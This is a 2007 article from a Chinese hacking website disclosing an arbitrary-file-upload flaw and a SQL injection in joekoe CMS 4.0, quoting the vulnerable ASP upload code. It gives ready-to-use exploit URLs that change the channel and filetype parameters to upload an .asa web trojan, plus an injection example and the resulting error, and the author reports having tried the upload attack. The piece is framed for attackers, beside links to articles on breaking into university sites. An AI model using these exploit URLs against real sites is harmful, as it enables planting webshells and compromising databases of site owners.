黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 文章正文
[推荐]joekoe CMS 4.0 两个漏洞(上传漏洞+注入)
      ★★★★★
joekoe CMS 4.0 两个漏洞(上传漏洞+注入)
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-7-26


SQL注入漏洞
还是在web.upload.asp中:

以下是引用片段:
...........
sub doParseUploadData()
dim tmpFilePath,tmpFileType,tmpFileSize,tmpName
tmpFilePath=up.getFileInfo("file.path")
tmpFileType=up.getFileInfo("filetype")
tmpFileSize=opsCommon.toInt(up.getFileInfo("filesize"))
tmpName=up.getFileInfo("name")
dim tmpChannel,tmpDataid,tmpType,tmpSQL,tmpID
tmpChannel=upConfig.channel
tmpDataid=0
tmpType=0
select case upConfig.channel
case "user.face"
 tmpDataid=upConfig.userid
 tmpChannel="face"
 tmpType=1
 tmpSQL="select top 1 u_id from db_sys_upload where

nsort='"&tmpChannel&"' and iid="&tmpDataid&""
case "blog.logo"
 tmpDataid=toInt(ops.client.getSession("user.blogid"))
 if tmpDataid<1 then tmpDataid=upConfig.userid
 tmpChannel="blog"
 tmptype=1
 tmpSQL="select top 1 u_id from db_sys_upload where

nsort='"&tmpChannel&"' and iid="&tmpDataid&""
case else
 tmpSQL="select top 1 u_id from db_sys_upload where

u_url='"&tmpFilePath&"'"
end select
..........

看这句tmpSQL="select top 1 u_id from db_sys_upload where u_url='"&tmpFilePath&"'",u_url来自&tmpFilePath&,而&tmpFilePath&来自up.getFileInfo("file.path"),呵呵,没有经过任何过滤就放到SQL查询语句里面查询了。

利用方法:
1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马了,具体url可以这样common/upload.asp?channel=use&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=,然后上传

2. SQL注入漏洞:在Channel变量中加入诸如语句,比如:common/upload.asp?channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=,然后上传,就会报错

Joekoe CMS 4.0
错误信息:

select top 1 u_id from db_sys_upload where

u_url='user'/20070722031234c.gif'
原始错误:
Error #-2147217900, 第 1 行: 'c' 附近有语法错误。 Microsoft OLE DB

Provider for SQL Server
返回首页
Processed in 0.188 s, 1 queries, 54 Cache.

自己试过。。上传没什么问题。。
后面的SQL。。好像已经没什么用了!!自己试吧!

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    joekoe CMS 4.0 两个漏洞(上传漏07-26
    XSS Phishing - 新式跨站脚本攻击07-26
    浅析XSS(Cross Site Script)漏洞07-26
    BBSXP 2007的漏洞利用演示07-11
    动网8.0最新漏洞07-11
    LBS blog又一注射漏洞含漏洞解析07-04
    BBSxp 2007 注射漏洞07-02
    淘宝taobao 跨站 XSS 漏洞06-29
    LBS blog sql注射漏洞(统杀所有版06-29
    最新QQ 163 126 等邮箱跨站挂马代06-18
    入侵清华大学全过程06-14
    入侵复旦大学06-14
    相 关 文 章
  • 浅析XSS(Cross Site Script)漏洞原理

  • Joolo提供1G免费php空间,支持FTP上传

  • PHP168 CMS的一次新异漏洞分析

  • Tomcat漏洞利用

  • BBSXP多个注入点漏洞

  • BBSXP 2007的漏洞利用演示

  • 动网8.0最新漏洞

  • 利用校内网XSS漏洞更改访问量

  • LBS blog又一注射漏洞含漏洞解析和exp

  • BBSxp 2007 注射漏洞

  • 淘宝taobao 跨站 XSS 漏洞

  • LBS blog sql注射漏洞(统杀所有版本)

  • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886